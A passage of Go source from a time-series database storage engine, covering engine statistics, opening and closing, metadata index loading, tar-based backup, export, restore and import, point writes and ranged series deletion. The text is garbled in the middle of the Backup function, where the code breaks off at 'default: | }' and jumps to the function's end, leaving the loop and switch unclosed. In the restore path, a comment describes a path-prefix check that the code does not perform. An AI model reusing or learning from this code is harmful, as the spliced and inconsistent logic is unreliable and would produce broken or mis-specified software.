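// schedules a full compaction so restored data is merged promptly.)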
// Path returns the path the engine was opened with.
func (e *Engine) Path() string { return e.path }
func (e *Engine) SetFieldName(measurement []byte, name string) {
e.index.SetFieldName(measurement, name)
}
func (e *Engine) MeasurementExists(name []byte) (bool, error) {
return e.index.MeasurementExists(name)
}
func (e *Engine) MeasurementNamesByRegex(re *regexp.Regexp) ([][]byte, error) {
return e.index.MeasurementNamesByRegex(re)
}
// MeasurementFieldSet returns the measurement field set.
func (e *Engine) MeasurementFieldSet() *tsdb.MeasurementFieldSet {
return e.fieldset
}
// MeasurementFields returns the measurement fields for a measurement.
func (e *Engine) MeasurementFields(measurement []byte) *tsdb.MeasurementFields {
return e.fieldset.CreateFieldsIfNotExists(measurement)
}
func (e *Engine) HasTagKey(name, key []byte) (bool, error) {
return e.index.HasTagKey(name, key)
}
func (e *Engine) MeasurementTagKeysByExpr(name []byte, expr influxql.Expr) (map[string]struct{}, error) {
return e.index.MeasurementTagKeysByExpr(name, expr)
}
func (e *Engine) TagKeyCardinality(name, key []byte) int {
return e.index.TagKeyCardinality(name, key)
}
// SeriesN returns the unique number of series in the index.
func (e *Engine) SeriesN() int64 {
return e.index.SeriesN()
}
// MeasurementsSketches returns sketches that describe the cardinality of the
// measurements in this shard and measurements that were in this shard, but have
// been tombstoned.
func (e *Engine) MeasurementsSketches() (estimator.Sketch, estimator.Sketch, error) {
return e.index.MeasurementsSketches()
}
// SeriesSketches returns sketches that describe the cardinality of the
// series in this shard and series that were in this shard, but have
// been tombstoned.
func (e *Engine) SeriesSketches() (estimator.Sketch, estimator.Sketch, error) {
return e.index.SeriesSketches()
}
// LastModified returns the time when this shard was last modified.
func (e *Engine) LastModified() time.Time {
fsTime := e.FileStore.LastModified()
if e.WALEnabled && e.WAL.LastWriteTime().After(fsTime) {
return e.WAL.LastWriteTime()
}
return fsTime
}
// EngineStatistics maintains statistics for the engine.
type EngineStatistics struct {
CacheCompactions int64 // Counter of cache compactions that have ever run.
CacheCompactionsActive int64 // Gauge of cache compactions currently running.
CacheCompactionErrors int64 // Counter of cache compactions that have failed due to error.
CacheCompactionDuration int64 // Counter of number of wall nanoseconds spent in cache compactions.
TSMCompactions [3]int64 // Counter of TSM compactions (by level) that have ever run.
TSMCompactionsActive [3]int64 // Gauge of TSM compactions (by level) currently running.
TSMCompactionErrors [3]int64 // Counter of TSM compactions (by level) that have failed due to error.
TSMCompactionDuration [3]int64 // Counter of number of wall nanoseconds spent in TSM compactions (by level).
TSMCompactionsQueue [3]int64 // Gauge of TSM compactions queues (by level).
TSMOptimizeCompactions int64 // Counter of optimize compactions that have ever run.
TSMOptimizeCompactionsActive int64 // Gauge of optimize compactions currently running.
TSMOptimizeCompactionErrors int64 // Counter of optimize compactions that have failed due to error.
TSMOptimizeCompactionDuration int64 // Counter of number of wall nanoseconds spent in optimize compactions.
TSMOptimizeCompactionsQueue int64 // Gauge of optimize compactions queue.
TSMFullCompactions int64 // Counter of full compactions that have ever run.
TSMFullCompactionsActive int64 // Gauge of full compactions currently running.
TSMFullCompactionErrors int64 // Counter of full compactions that have failed due to error.
TSMFullCompactionDuration int64 // Counter of number of wall nanoseconds spent in full compactions.
TSMFullCompactionsQueue int64 // Gauge of full compactions queue.
}
// Statistics returns statistics for periodic monitoring.
func (e *Engine) Statistics(tags map[string]string) []models.Statistic {
statistics := make([]models.Statistic, 0, 4)
statistics = append(statistics, models.Statistic{
Name: "tsm1_engine",
Tags: tags,
Values: map[string]interface{}{
statCacheCompactions: atomic.LoadInt64(&e.stats.CacheCompactions),
statCacheCompactionsActive: atomic.LoadInt64(&e.stats.CacheCompactionsActive),
statCacheCompactionError: atomic.LoadInt64(&e.stats.CacheCompactionErrors),
statCacheCompactionDuration: atomic.LoadInt64(&e.stats.CacheCompactionDuration),
statTSMLevel1Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[0]),
statTSMLevel1CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[0]),
statTSMLevel1CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[0]),
statTSMLevel1CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[0]),
statTSMLevel1CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[0]),
statTSMLevel2Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[1]),
statTSMLevel2CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[1]),
statTSMLevel2CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[1]),
statTSMLevel2CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[1]),
statTSMLevel2CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[1]),
statTSMLevel3Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[2]),
statTSMLevel3CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[2]),
statTSMLevel3CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[2]),
statTSMLevel3CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[2]),
statTSMLevel3CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[2]),
statTSMOptimizeCompactions: atomic.LoadInt64(&e.stats.TSMOptimizeCompactions),
statTSMOptimizeCompactionsActive: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsActive),
statTSMOptimizeCompactionError: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionErrors),
statTSMOptimizeCompactionDuration: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionDuration),
statTSMOptimizeCompactionQueue: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsQueue),
statTSMFullCompactions: atomic.LoadInt64(&e.stats.TSMFullCompactions),
statTSMFullCompactionsActive: atomic.LoadInt64(&e.stats.TSMFullCompactionsActive),
statTSMFullCompactionError: atomic.LoadInt64(&e.stats.TSMFullCompactionErrors),
statTSMFullCompactionDuration: atomic.LoadInt64(&e.stats.TSMFullCompactionDuration),
statTSMFullCompactionQueue: atomic.LoadInt64(&e.stats.TSMFullCompactionsQueue),
},
})
statistics = append(statistics, e.Cache.Statistics(tags)...)
statistics = append(statistics, e.FileStore.Statistics(tags)...)
if e.WALEnabled {
statistics = append(statistics, e.WAL.Statistics(tags)...)
}
return statistics
}
// DiskSize returns the total size in bytes of all TSM and WAL segments on disk.
func (e *Engine) DiskSize() int64 {
var walDiskSizeBytes int64
if e.WALEnabled {
walDiskSizeBytes = e.WAL.DiskSizeBytes()
}
return e.FileStore.DiskSizeBytes() + walDiskSizeBytes
}
// Open opens and initializes the engine.
// TODO(edd): plumb context
func (e *Engine) Open() error {
if err := os.MkdirAll(e.path, 0777); err != nil {
return err
}
if err := e.cleanup(); err != nil {
return err
}
fields, err := tsdb.NewMeasurementFieldSet(filepath.Join(e.path, "fields.idx"))
if err != nil {
e.logger.Warn(fmt.Sprintf("error opening fields.idx: %v. Rebuilding.", err))
}
e.mu.Lock()
e.fieldset = fields
e.mu.Unlock()
e.index.SetFieldSet(fields)
if e.WALEnabled {
if err := e.WAL.Open(); err != nil {
return err
}
}
if err := e.FileStore.Open(); err != nil {
return err
}
if e.WALEnabled {
if err := e.reloadCache(); err != nil {
return err
}
}
e.Compactor.Open()
if e.enableCompactionsOnOpen {
e.SetCompactionsEnabled(true)
}
return nil
}
// Close closes the engine. Subsequent calls to Close are a nop.
func (e *Engine) Close() error {
e.SetCompactionsEnabled(false)
// Lock now and close everything else down.
e.mu.Lock()
defer e.mu.Unlock()
e.done = nil // Ensures that the channel will not be closed again.
if err := e.FileStore.Close(); err != nil {
return err
}
if e.WALEnabled {
return e.WAL.Close()
}
return nil
}
// WithLogger sets the logger for the engine.
func (e *Engine) WithLogger(log *zap.Logger) {
e.logger = log.With(zap.String("engine", "tsm1"))
if e.traceLogging {
e.traceLogger = e.logger
}
if e.WALEnabled {
e.WAL.WithLogger(e.logger)
}
e.FileStore.WithLogger(e.logger)
}
// LoadMetadataIndex loads the shard metadata into memory.
//
// Note, it is not safe to call LoadMetadataIndex concurrently. LoadMetadataIndex
// should only be called when initialising a new Engine.
func (e *Engine) LoadMetadataIndex(shardID uint64, index tsdb.Index) error {
now := time.Now()
// Save reference to index for iterator creation.
e.index = index
// If we have the cached fields index on disk and we're using TSI, we
// can skip scanning all the TSM files.
if e.index.Type() != inmem.IndexName && !e.fieldset.IsEmpty() {
return nil
}
keys := make([][]byte, 0, 10000)
fieldTypes := make([]influxql.DataType, 0, 10000)
if err := e.FileStore.WalkKeys(nil, func(key []byte, typ byte) error {
fieldType := BlockTypeToInfluxQLDataType(typ)
if fieldType == influxql.Unknown {
return fmt.Errorf("unknown block type: %v", typ)
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
return nil
}); err != nil {
return err
}
if len(keys) > 0 {
// Add remaining partial batch from FileStore.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
// load metadata from the Cache
if err := e.Cache.ApplyEntryFn(func(key []byte, entry *entry) error {
fieldType, err := entry.values.InfluxQLType()
if err != nil {
e.logger.Info("Error getting the data type of values for key", zap.ByteString("key", key), zap.Error(err))
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
return nil
}); err != nil {
return err
}
if len(keys) > 0 {
// Add remaining partial batch from FileStore.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
}
// Save the field set index so we don't have to rebuild it next time
if err := e.fieldset.Save(); err != nil {
return err
}
e.traceLogger.Info("Meta data index for shard loaded", zap.Uint64("id", shardID), zap.Duration("duration", time.Since(now)))
return nil
}
// IsIdle returns true if the cache is empty, there are no running compactions and the
// shard is fully compacted.
func (e *Engine) IsIdle() bool {
cacheEmpty := e.Cache.Size() == 0
runningCompactions := atomic.LoadInt64(&e.stats.CacheCompactionsActive)
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[0])
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[1])
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[2])
runningCompactions += atomic.LoadInt64(&e.stats.TSMFullCompactionsActive)
runningCompactions += atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsActive)
return cacheEmpty && runningCompactions == 0 && e.CompactionPlan.FullyCompacted()
}
// Free releases any resources held by the engine to free up memory or CPU.
func (e *Engine) Free() error {
e.Cache.Free()
return e.FileStore.Free()
}
// Backup writes a tar archive of any TSM files modified since the passed
// in time to the passed in writer. The basePath will be prepended to the names
// of the files in the archive. It will force a snapshot of the WAL first
// then perform the backup with a read lock against the file store. This means
// that new TSM files will not be able to be created in this shard while the
// backup is running. For shards that are still actively getting writes, this
// could cause the WAL to back up, increasing memory usage and eventually rejecting writes.
func (e *Engine) Backup(w io.Writer, basePath string, since time.Time) error {
var err error
var path string
for i := 0; i < 3; i++ {
path, err = e.CreateSnapshot()
if err != nil {
switch err {
case ErrSnapshotInProgress:
backoff := time.Duration(math.Pow(32, float64(i))) * time.Millisecond
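// 32^i ms: 1ms, 32ms, then 1024ms across the three attempts.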
time.Sleep(backoff)
default: | }
if err == ErrSnapshotInProgress {
e.logger.Warn("Snapshotter busy: Backup proceeding without snapshot contents.")
}
// Remove the temporary snapshot dir
defer os.RemoveAll(path)
return intar.Stream(w, path, basePath, intar.SinceFilterTarFile(since))
}
func (e *Engine) timeStampFilterTarFile(start, end time.Time) func(f os.FileInfo, shardRelativePath, fullPath string, tw *tar.Writer) error {
return func(fi os.FileInfo, shardRelativePath, fullPath string, tw *tar.Writer) error {
if !strings.HasSuffix(fi.Name(), ".tsm") {
return intar.StreamFile(fi, shardRelativePath, fullPath, tw)
}
var tombstonePath string
f, err := os.Open(fullPath)
if err != nil {
return err
}
r, err := NewTSMReader(f)
if err != nil {
return err
}
// Grab the tombstone file if one exists.
if r.HasTombstones() {
tombstonePath = filepath.Base(r.TombstoneFiles()[0].Path)
return intar.StreamFile(fi, shardRelativePath, tombstonePath, tw)
}
min, max := r.TimeRange()
stun := start.UnixNano()
eun := end.UnixNano()
// The time ranges overlap, so we need to filter the file
if min >= stun && min <= eun && max > eun || // overlap to the right
max >= stun && max <= eun && min < stun || // overlap to the left
min <= stun && max >= eun { // TSM file has a range LARGER than the boundary
err := e.filterFileToBackup(r, fi, shardRelativePath, fullPath, start.UnixNano(), end.UnixNano(), tw)
if err != nil {
if err := r.Close(); err != nil {
return err
}
return err
}
}
// above is the only case where we need to keep the reader open.
if err := r.Close(); err != nil {
return err
}
// the TSM file is 100% inside the range, so we can just write it without scanning each block
if min >= start.UnixNano() && max <= end.UnixNano() {
if err := intar.StreamFile(fi, shardRelativePath, fullPath, tw); err != nil {
return err
}
}
return nil
}
}
func (e *Engine) Export(w io.Writer, basePath string, start time.Time, end time.Time) error {
path, err := e.CreateSnapshot()
if err != nil {
return err
}
// Remove the temporary snapshot dir
defer os.RemoveAll(path)
return intar.Stream(w, path, basePath, e.timeStampFilterTarFile(start, end))
}
func (e *Engine) filterFileToBackup(r *TSMReader, fi os.FileInfo, shardRelativePath, fullPath string, start, end int64, tw *tar.Writer) error {
path := fullPath + ".tmp"
out, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, 0666)
if err != nil {
return err
}
defer os.Remove(path)
w, err := NewTSMWriter(out)
if err != nil {
return err
}
defer w.Close()
// implicit else: here we iterate over the blocks and only keep the ones we really want.
bi := r.BlockIterator()
for bi.Next() {
// not concerned with typ or checksum since we are just blindly writing back, with no decoding
key, minTime, maxTime, _, _, buf, err := bi.Read()
if err != nil {
return err
}
if minTime >= start && minTime <= end ||
maxTime >= start && maxTime <= end ||
minTime <= start && maxTime >= end {
err := w.WriteBlock(key, minTime, maxTime, buf)
if err != nil {
return err
}
}
}
if err := bi.Err(); err != nil {
return err
}
err = w.WriteIndex()
if err != nil {
return err
}
// make sure the whole file is out to disk
if err := w.Flush(); err != nil {
return err
}
tmpFi, err := os.Stat(path)
if err != nil {
return err
}
return intar.StreamRenameFile(tmpFi, fi.Name(), shardRelativePath, path, tw)
}
// Restore reads a tar archive generated by Backup().
// Only files that match basePath will be copied into the directory. This obtains
// a write lock so no operations can be performed while restoring.
func (e *Engine) Restore(r io.Reader, basePath string) error {
return e.overlay(r, basePath, false)
}
// Import reads a tar archive generated by Backup() and adds each
// file matching basePath as a new TSM file. This obtains
// a write lock so no operations can be performed while Importing.
// If the import is successful, a full compaction is scheduled.
func (e *Engine) Import(r io.Reader, basePath string) error {
if err := e.overlay(r, basePath, true); err != nil {
return err
}
return e.ScheduleFullCompaction()
}
// overlay reads a tar archive generated by Backup() and adds each file
// from the archive matching basePath to the shard.
// If asNew is true, each file will be installed as a new TSM file even if an
// existing file with the same name in the backup exists.
func (e *Engine) overlay(r io.Reader, basePath string, asNew bool) error {
// Copy files from archive while under lock to prevent reopening.
newFiles, err := func() ([]string, error) {
e.mu.Lock()
defer e.mu.Unlock()
var newFiles []string
tr := tar.NewReader(r)
for {
if fileName, err := e.readFileFromBackup(tr, basePath, asNew); err == io.EOF {
break
} else if err != nil {
return nil, err
} else if fileName != "" {
newFiles = append(newFiles, fileName)
}
}
if err := file.SyncDir(e.path); err != nil {
return nil, err
}
// The filestore will only handle tsm files. Other file types will be ignored.
if err := e.FileStore.Replace(nil, newFiles); err != nil {
return nil, err
}
return newFiles, nil
}()
if err != nil {
return err
}
// Load any new series keys to the index
tsmFiles := make([]TSMFile, 0, len(newFiles))
defer func() {
for _, r := range tsmFiles {
r.Close()
}
}()
ext := fmt.Sprintf(".%s", TmpTSMFileExtension)
for _, f := range newFiles {
// If asNew is true, the files created from readFileFromBackup will be new ones
// having a temp extension.
f = strings.TrimSuffix(f, ext)
if !strings.HasSuffix(f, TSMFileExtension) {
// This isn't a .tsm file.
continue
}
fd, err := os.Open(f)
if err != nil {
return err
}
r, err := NewTSMReader(fd)
if err != nil {
return err
}
tsmFiles = append(tsmFiles, r)
}
// Merge and dedup all the series keys across each reader to reduce
// lock contention on the index.
keys := make([][]byte, 0, 10000)
fieldTypes := make([]influxql.DataType, 0, 10000)
ki := newMergeKeyIterator(tsmFiles, nil)
for ki.Next() {
key, typ := ki.Read()
fieldType := BlockTypeToInfluxQLDataType(typ)
if fieldType == influxql.Unknown {
return fmt.Errorf("unknown block type: %v", typ)
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
}
if len(keys) > 0 {
// Add remaining partial batch.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
}
return nil
}
// readFileFromBackup copies the next file from the archive into the shard.
// The file is skipped if it does not have a matching shardRelativePath prefix.
// If asNew is true, each file will be installed as a new TSM file even if an
// existing file with the same name in the backup exists.
func (e *Engine) readFileFromBackup(tr *tar.Reader, shardRelativePath string, asNew bool) (string, error) {
// Read next archive file.
hdr, err := tr.Next()
if err != nil {
return "", err
}
if !strings.HasSuffix(hdr.Name, TSMFileExtension) {
// This isn't a .tsm file.
return "", nil
}
filename := filepath.Base(filepath.FromSlash(hdr.Name))
// If this is a directory entry (usually just `index` for tsi), create it and move on.
if hdr.Typeflag == tar.TypeDir {
if err := os.MkdirAll(filepath.Join(e.path, filename), os.FileMode(hdr.Mode).Perm()); err != nil {
return "", err
}
return "", nil
}
if asNew {
filename = e.formatFileName(e.FileStore.NextGeneration(), 1) + "." + TSMFileExtension
}
tmp := fmt.Sprintf("%s.%s", filepath.Join(e.path, filename), TmpTSMFileExtension)
// Create new file on disk.
f, err := os.OpenFile(tmp, os.O_CREATE|os.O_RDWR, 0666)
if err != nil {
return "", err
}
defer f.Close()
// Copy from archive to the file.
if _, err := io.CopyN(f, tr, hdr.Size); err != nil {
return "", err
}
// Sync to disk & close.
if err := f.Sync(); err != nil {
return "", err
}
return tmp, nil
}
// addToIndexFromKey will pull the measurement names, series keys, and field
// names from composite keys, and add them to the database index and measurement
// fields.
func (e *Engine) addToIndexFromKey(keys [][]byte, fieldTypes []influxql.DataType) error {
var field []byte
names := make([][]byte, 0, len(keys))
tags := make([]models.Tags, 0, len(keys))
for i := 0; i < len(keys); i++ {
// Replace tsm key format with index key format.
keys[i], field = SeriesAndFieldFromCompositeKey(keys[i])
name := models.ParseName(keys[i])
mf := e.fieldset.CreateFieldsIfNotExists(name)
if err := mf.CreateFieldIfNotExists(field, fieldTypes[i]); err != nil {
return err
}
names = append(names, name)
tags = append(tags, models.ParseTags(keys[i]))
}
// Build in-memory index, if necessary.
if e.index.Type() == inmem.IndexName {
if err := e.index.InitializeSeries(keys, names, tags); err != nil {
return err
}
} else {
if err := e.index.CreateSeriesListIfNotExists(keys, names, tags); err != nil {
return err
}
}
return nil
}
// WritePoints writes metadata and point data into the engine.
// It returns an error if new points are added to an existing key.
func (e *Engine) WritePoints(points []models.Point) error {
values := make(map[string][]Value, len(points))
var (
keyBuf []byte
baseLen int
seriesErr error
)
for _, p := range points {
keyBuf = append(keyBuf[:0], p.Key()...)
keyBuf = append(keyBuf, keyFieldSeparator...)
baseLen = len(keyBuf)
iter := p.FieldIterator()
t := p.Time().UnixNano()
for iter.Next() {
// Skip fields name "time", they are illegal
if bytes.Equal(iter.FieldKey(), timeBytes) {
continue
}
keyBuf = append(keyBuf[:baseLen], iter.FieldKey()...)
if e.seriesTypeMap != nil {
// Fast-path check to see if the field for the series already exists.
if v, ok := e.seriesTypeMap.Get(keyBuf); !ok {
if typ, err := e.Type(keyBuf); err != nil {
// Field type is unknown, we can try to add it.
} else if typ != iter.Type() {
// Existing type is different from what was passed in, we need to drop
// this write and refresh the series type map.
seriesErr = tsdb.ErrFieldTypeConflict
e.seriesTypeMap.Insert(keyBuf, int(typ))
continue
}
// Doesn't exist, so try to insert
vv, ok := e.seriesTypeMap.Insert(keyBuf, int(iter.Type()))
// We didn't insert and the type that exists isn't what we tried to insert, so
// we have a conflict and must drop this field/series.
if !ok || vv != int(iter.Type()) {
seriesErr = tsdb.ErrFieldTypeConflict
continue
}
} else if v != int(iter.Type()) {
// The series already exists, but with a different type. This is also a type conflict
// and we need to drop this field/series.
seriesErr = tsdb.ErrFieldTypeConflict
continue
}
}
var v Value
switch iter.Type() {
case models.Float:
fv, err := iter.FloatValue()
if err != nil {
return err
}
v = NewFloatValue(t, fv)
case models.Integer:
iv, err := iter.IntegerValue()
if err != nil {
return err
}
v = NewIntegerValue(t, iv)
case models.Unsigned:
iv, err := iter.UnsignedValue()
if err != nil {
return err
}
v = NewUnsignedValue(t, iv)
case models.String:
v = NewStringValue(t, iter.StringValue())
case models.Boolean:
bv, err := iter.BooleanValue()
if err != nil {
return err
}
v = NewBooleanValue(t, bv)
default:
return fmt.Errorf("unknown field type for %s: %s", string(iter.FieldKey()), p.String())
}
values[string(keyBuf)] = append(values[string(keyBuf)], v)
}
}
e.mu.RLock()
defer e.mu.RUnlock()
// first try to write to the cache
if err := e.Cache.WriteMulti(values); err != nil {
return err
}
if e.WALEnabled {
if _, err := e.WAL.WriteMulti(values); err != nil {
return err
}
}
return seriesErr
}
// DeleteSeriesRange removes the values between min and max (inclusive) from all series
func (e *Engine) DeleteSeriesRange(itr tsdb.SeriesIterator, min, max int64) error {
return e.DeleteSeriesRangeWithPredicate(itr, func(name []byte, tags models.Tags) (int64, int64, bool) {
return min, max, true
})
}
// DeleteSeriesRangeWithPredicate removes the values between min and max (inclusive) from all series
// for which predicate() returns true. If predicate() is nil, then all values in range are removed.
func (e *Engine) DeleteSeriesRangeWithPredicate(itr tsdb.SeriesIterator, predicate func(name []byte, tags models.Tags) (int64, int64, bool)) error {
var disableOnce bool
// Ensure that the index does not compact away the measurement or series we're
// going to delete before we're done with them.
if tsiIndex, ok := e.index.(*tsi1.Index); ok {
tsiIndex.DisableCompactions()
defer tsiIndex.EnableCompactions()
tsiIndex.Wait()
fs, err := tsiIndex.RetainFileSet()
if err != nil {
return err
}
defer fs.Release()
}
var (
sz int
min, max int64 = math.MinInt64, math.MaxInt64
// Indicator that the min/max time for the current batch has changed and
// we need to flush the current batch before appending to it.
flushBatch bool
)
// These are reversed from min/max to ensure they are different the first time through.
newMin, newMax := int64(math.MaxInt64), int64(math.MinInt64)
// There is no predicate, so set up newMin/newMax to delete the full time range.
if predicate == nil {
newMin = min
newMax = max
}
batch := make([][]byte, 0, 10000)
for {
elem, err := itr.Next()
if err != nil {
return err
} else if elem == nil {
break
}
// See if the series should be deleted and if so, what range of time.
if predicate != nil {
var shouldDelete bool
newMin, newMax, shouldDelete = predicate(elem.Name(), elem.Tags())
if !shouldDelete {
continue
}
// If the min/max happens to change for the batch, we need to flush
// the current batch and start a new one.
flushBatch = (min != newMin || max != newMax) && len(batch) > 0
}
if elem.Expr() != nil {
if v, ok := elem.Expr().(*influxql.BooleanLiteral); !ok || !v.Val {
return errors.New("fields not supported in WHERE clause during deletion")
}
}
if !disableOnce {
// Disable and abort running compactions so that tombstones added to existing tsm
// files don't get removed. This would cause deleted measurements/series to
// re-appear once the compaction completes. We only disable the level compactions
// so that snapshotting does not stop while writing out tombstones. If it is stopped,
// and writing tombstones takes a long time, writes can get rejected due to the cache
// filling up.
e.disableLevelCompactions(true)
defer e.enableLevelCompactions(true)
e.sfile.DisableCompactions()
defer e.sfile.EnableCompactions()
e.sfile.Wait()
disableOnce = true
}
if sz >= deleteFlushThreshold || flushBatch {
// Delete all matching batch.
if err := e.deleteSeriesRange(batch, min, max); err != nil {
return err
}
batch = batch[:0]
sz = 0
flushBatch = false
}
// Use the new min/max time for the next iteration
min = newMin
max = newMax
key := models.MakeKey(elem.Name(), elem.Tags())
sz += len(key)
batch = append(batch, key)
}
if len(batch) > 0 {
// Delete all matching batch.
if err := e.deleteSeriesRange(batch, min, max); err != nil {
return err
}
}
e.index.Rebuild()
return nil
}
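// Example for DeleteSeriesRangeWithPredicate (an illustrative sketch, not part of
// the engine API; "cpu" and cutoff are hypothetical): delete only points for one
// measurement older than a cutoff, keeping every other series intact:
//
//	err := e.DeleteSeriesRangeWithPredicate(itr, func(name []byte, tags models.Tags) (int64, int64, bool) {
//		if !bytes.Equal(name, []byte("cpu")) {
//			return 0, 0, false // skip series from other measurements
//		}
//		return math.MinInt64, cutoff, true // delete everything up to cutoff
//	})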
// deleteSeriesRange removes the values between min and max (inclusive) from all series. This
// does not update the index or disable compactions. This should mainly be called by DeleteSeriesRange
// and not directly.
func (e *Engine) deleteSeriesRange(seriesKeys [][]byte, min, max int64) error {
if len(seriesKeys) == 0 {
return nil
}
// Min and max time in the engine are slightly different from the query language values.
if min == influxql.MinTime {
min = math.MinInt64
}
if max == influxql.MaxTime {
max = math.MaxInt64
}
var overlapsTimeRangeMinMax bool
var overlapsTimeRangeMinMaxLock sync.Mutex
e.FileStore.Apply(func(r TSMFile) error {
if r.OverlapsTimeRange(min, max) {
overlapsTimeRangeMinMaxLock.Lock()
overlapsTimeRangeMinMax = true
overlapsTimeRangeMinMaxLock.Unlock()
}
return nil
})
if !overlapsTimeRangeMinMax && e.Cache.store.count() > 0 {
overlapsTimeRangeMinMax = true
}
if !overlapsTimeRangeMinMax {
return nil
}
// Ensure keys are sorted since lower layers require them to be.
if !bytesutil.IsSorted(seriesKeys) {
bytesutil.Sort(seriesKeys)
}
// Run the delete on each TSM file in parallel
if err := e.FileStore.Apply(func(r TSMFile) error {
// See if this TSM file contains the keys and time range
minKey, maxKey := seriesKeys[0], seriesKeys[len(seriesKeys)-1]
tsmMin, tsmMax := r.KeyRange()
tsmMin, _ = SeriesAndFieldFromCompositeKey(tsmMin)
tsmMax, _ = SeriesAndFieldFromCompositeKey(tsmMax)
overlaps := bytes.Compare(tsmMin, maxKey) <= 0 && bytes.Compare(tsmMax, minKey) >= 0
if !overlaps || !r.OverlapsTimeRange(min, max) {
return nil
}
// Delete each key we find in the file. We seek to the min key and walk from there.
batch := r.BatchDelete()
n := r.KeyCount()
var j int
for i := r.Seek(minKey); i < n; i++ {
indexKey, _ := r.KeyAt(i)
seriesKey, _ := SeriesAndFieldFromCompositeKey(indexKey)
for j < len(seriesKeys) && bytes.Compare(seriesKeys[j], seriesKey) < 0 {
j++
}
if j >= len(seriesKeys) {
break
}
if bytes.Equal(seriesKeys[j], seriesKey) {
if err := batch.DeleteRange([][]byte{indexKey}, min, max); err != nil {
batch.Rollback()
return err
}
}
}
return batch.Commit()
}); err != nil {
return err
}
// find the keys in the cache and remove them
deleteKeys := make([][]byte, 0, len(seriesKeys))
// ApplyEntryFn cannot return an error in this invocation.
_ = e.Cache.ApplyEntryFn(func(k []byte, _ *entry) error {
seriesKey, _ := SeriesAndFieldFromCompositeKey([]byte(k))
// Cache does not walk keys in sorted order, so search the sorted
// series we need to delete to see if any of the cache keys match.
i := bytesutil.SearchBytes(seriesKeys, seriesKey)
if i < len(seriesKeys) && bytes.Equal(seriesKey, seriesKeys[i]) {
// k is the measurement + tags + sep + field
deleteKeys = append(deleteKeys, k)
}
return nil
})
// Sort the series keys because ApplyEntryFn iterates over the keys randomly.
bytesutil.Sort(deleteKeys)
e.Cache.DeleteRange(deleteKeys, min, max)
// delete from the WAL
if e.WALEnabled {
if _, err := e.WAL.DeleteRange(deleteKeys, min, max); err != nil {
return err
}
}
// The series are deleted on disk, but the index may still say they exist.
// Depending on the min/max time passed in, the series may or may not actually
// exist now. To reconcile the index, we walk the series keys that still exist
// on disk and cross out any keys that match the passed-in series. Any series
// left in the slice at the end do not exist and can be deleted from the index.
// Note: this is inherently racy if writes are occurring to the same measurement/series
// being removed. A write could occur and exist in the cache at this point, but we
// would delete it from the index.
minKey := seriesKeys[0]
// Apply runs this func concurrently. The seriesKeys slice is mutated concurrently
// by different goroutines setting matched positions to emptyBytes.
if err := e.FileStore.Apply(func(r TSMFile) error {
n := r.KeyCount()
var j int
// Start from the min deleted key that exists in this file.
for i := r.Seek(minKey); i < n; i++ {
if j >= len(seriesKeys) {
return nil
}
indexKey, _ := r.KeyAt(i)
seriesKey, _ := SeriesAndFieldFromCompositeKey(indexKey)
// Skip over any deleted keys that are less than our tsm key
cmp := bytes.Compare(seriesKeys[j], seriesKey)
for j < len(seriesKeys) && cmp < 0 {
j++
if j >= len(seriesKeys) {
return nil
}
cmp = bytes.Compare(seriesKeys[j], seriesKey)
}
// We've found a matching key, cross it out so we do not remove it from the index.
if j < len(seriesKeys) && cmp == 0 {
seriesKeys[j] = emptyBytes
j++
}
}
return nil
}); err != nil {
return err
}
// The seriesKeys slice is mutated if they are still found in the cache.
cacheKeys := e.Cache.Keys()
for i := 0; i < len(seriesKeys); i++ {
seriesKey := seriesKeys[i]
// Already crossed out
if len(seriesKey) == 0 {
continue
}
j := bytesutil.SearchBytes(cacheKeys, seriesKey)
if j < len(cacheKeys) {
cacheSeriesKey, _ := SeriesAndFieldFromCompositeKey(cacheKeys[j])
if bytes.Equal(seriesKey, cacheSeriesKey) {
seriesKeys[i] = emptyBytes
}
}
}
// Have we deleted all values for the series? If so, we need to remove
// the series from the index.
hasDeleted := false
for _, k := range seriesKeys {
if len(k) > 0 {
hasDeleted = true
break
}
}
if hasDeleted {
buf := make([]byte, 1024) // For use when accessing series file.
ids := tsdb.NewSeriesIDSet()
